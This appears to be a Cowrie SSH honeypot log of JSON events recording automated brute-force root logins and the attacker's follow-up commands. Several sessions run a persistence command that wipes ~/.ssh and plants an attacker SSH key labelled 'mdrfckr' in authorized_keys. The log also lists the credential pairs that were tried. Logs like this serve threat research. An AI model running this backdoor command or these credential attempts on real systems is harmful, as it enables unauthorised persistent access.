{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:57:47.324473Z","src_ip":"212.227.235.229","session":"774829cbed9e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:57:48.089799Z","src_ip":"212.227.235.229","session":"774829cbed9e"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:57:48.264575Z","src_ip":"212.227.235.229","session":"4706f9dee9db"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:57:48.271531Z","src_ip":"212.227.235.229","session":"774829cbed9e"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:57:48.281016Z","src_ip":"139.19.117.131","session":"48d470a81257"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55278,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a1905c5a1db","protocol":"ssh","message":"New connection: 217.72.205.35:55278 (1.2.3.4:22) [session: 9a1905c5a1db]","sensor":"my-vps","timestamp":"2025-09-08T21:57:53.065993Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:57:53.067094Z","src_ip":"217.72.205.35","session":"9a1905c5a1db"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59326,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ecaad97a408","protocol":"ssh","message":"New connection: 212.227.235.229:59326 (1.2.3.4:22) [session: 1ecaad97a408]","sensor":"my-vps","timestamp":"2025-09-08T21:57:58.816882Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:57:58.817546Z","src_ip":"212.227.235.229","session":"1ecaad97a408"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:57:59.126957Z","src_ip":"212.227.235.229","session":"1ecaad97a408"}
{"eventid":"cowrie.login.success","username":"root","password":"Madrid2020","message":"login attempt [root/Madrid2020] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:58:00.406609Z","src_ip":"212.227.235.229","session":"1ecaad97a408"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:58:01.050359Z","src_ip":"212.227.235.229","session":"1ecaad97a408"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:58:01.051212Z","src_ip":"212.227.235.229","session":"1ecaad97a408"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:58:01.052705Z","src_ip":"212.227.235.229","session":"1ecaad97a408"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:58:01.362786Z","src_ip":"212.227.235.229","session":"1ecaad97a408"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:58:02.086897Z","src_ip":"212.227.235.229","session":"1ecaad97a408"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T21:58:02.087672Z","src_ip":"212.227.235.229","session":"1ecaad97a408"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T21:58:02.398581Z","src_ip":"212.227.235.229","session":"1ecaad97a408"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:58:02.399667Z","src_ip":"212.227.235.229","session":"1ecaad97a408"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59342,"dst_ip":"1.2.3.4","dst_port":22,"session":"4abf8a8e1f93","protocol":"ssh","message":"New connection: 212.227.235.229:59342 (1.2.3.4:22) [session: 4abf8a8e1f93]","sensor":"my-vps","timestamp":"2025-09-08T21:58:02.711962Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:58:02.712817Z","src_ip":"212.227.235.229","session":"4abf8a8e1f93"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:58:03.025762Z","src_ip":"212.227.235.229","session":"4abf8a8e1f93"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T21:58:04.313818Z","src_ip":"212.227.235.229","session":"4abf8a8e1f93"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:58:05.628270Z","src_ip":"212.227.235.229","session":"4abf8a8e1f93"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59348,"dst_ip":"1.2.3.4","dst_port":22,"session":"ccf1f9e854f8","protocol":"ssh","message":"New connection: 212.227.235.229:59348 (1.2.3.4:22) [session: ccf1f9e854f8]","sensor":"my-vps","timestamp":"2025-09-08T21:58:05.931030Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:58:05.931926Z","src_ip":"212.227.235.229","session":"ccf1f9e854f8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:58:06.237724Z","src_ip":"212.227.235.229","session":"ccf1f9e854f8"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:58:07.498875Z","src_ip":"212.227.235.229","session":"ccf1f9e854f8"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:58:07.805025Z","src_ip":"212.227.235.229","session":"1ecaad97a408"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:58:07.806071Z","src_ip":"212.227.235.229","session":"ccf1f9e854f8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59046,"dst_ip":"1.2.3.4","dst_port":22,"session":"ffd8863d785a","protocol":"ssh","message":"New connection: 212.227.235.229:59046 (1.2.3.4:22) [session: ffd8863d785a]","sensor":"my-vps","timestamp":"2025-09-08T21:58:16.538185Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52650,"dst_ip":"1.2.3.4","dst_port":22,"session":"102e57aee2f6","protocol":"ssh","message":"New connection: 212.227.235.229:52650 (1.2.3.4:22) [session: 102e57aee2f6]","sensor":"my-vps","timestamp":"2025-09-08T21:58:17.392942Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:58:17.522395Z","src_ip":"212.227.235.229","session":"102e57aee2f6"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:58:18.091097Z","src_ip":"212.227.235.229","session":"ffd8863d785a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:58:18.091786Z","src_ip":"212.227.235.229","session":"ffd8863d785a"}
{"eventid":"cowrie.login.success","username":"root","password":"123456aa@","message":"login attempt [root/123456aa@] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:58:19.808509Z","src_ip":"212.227.235.229","session":"ffd8863d785a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:58:20.362286Z","src_ip":"212.227.235.229","session":"ffd8863d785a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:58:20.363022Z","src_ip":"212.227.235.229","session":"ffd8863d785a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:58:20.364220Z","src_ip":"212.227.235.229","session":"ffd8863d785a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:58:20.615003Z","src_ip":"212.227.235.229","session":"ffd8863d785a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:58:21.130970Z","src_ip":"212.227.235.229","session":"ffd8863d785a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T21:58:21.131653Z","src_ip":"212.227.235.229","session":"ffd8863d785a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35438,"dst_ip":"1.2.3.4","dst_port":22,"session":"e86873423157","protocol":"ssh","message":"New connection: 212.227.235.229:35438 (1.2.3.4:22) [session: e86873423157]","sensor":"my-vps","timestamp":"2025-09-08T21:58:21.962029Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:58:21.962805Z","src_ip":"212.227.235.229","session":"e86873423157"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:58:22.252706Z","src_ip":"212.227.235.229","session":"e86873423157"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59052,"dst_ip":"1.2.3.4","dst_port":22,"session":"1bd4fa67fb2e","protocol":"ssh","message":"New connection: 212.227.235.229:59052 (1.2.3.4:22) [session: 1bd4fa67fb2e]","sensor":"my-vps","timestamp":"2025-09-08T21:58:22.692516Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:58:22.694105Z","src_ip":"212.227.235.229","session":"1bd4fa67fb2e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:58:22.942749Z","src_ip":"212.227.235.229","session":"1bd4fa67fb2e"}
{"eventid":"cowrie.login.failed","username":"db1inst1","password":"123","message":"login attempt [db1inst1/123] failed","sensor":"my-vps","timestamp":"2025-09-08T21:58:23.453264Z","src_ip":"212.227.235.229","session":"e86873423157"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60610,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3223fd1ac64","protocol":"ssh","message":"New connection: 212.227.235.229:60610 (1.2.3.4:22) [session: b3223fd1ac64]","sensor":"my-vps","timestamp":"2025-09-08T21:58:23.458483Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:58:23.459174Z","src_ip":"212.227.235.229","session":"b3223fd1ac64"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openss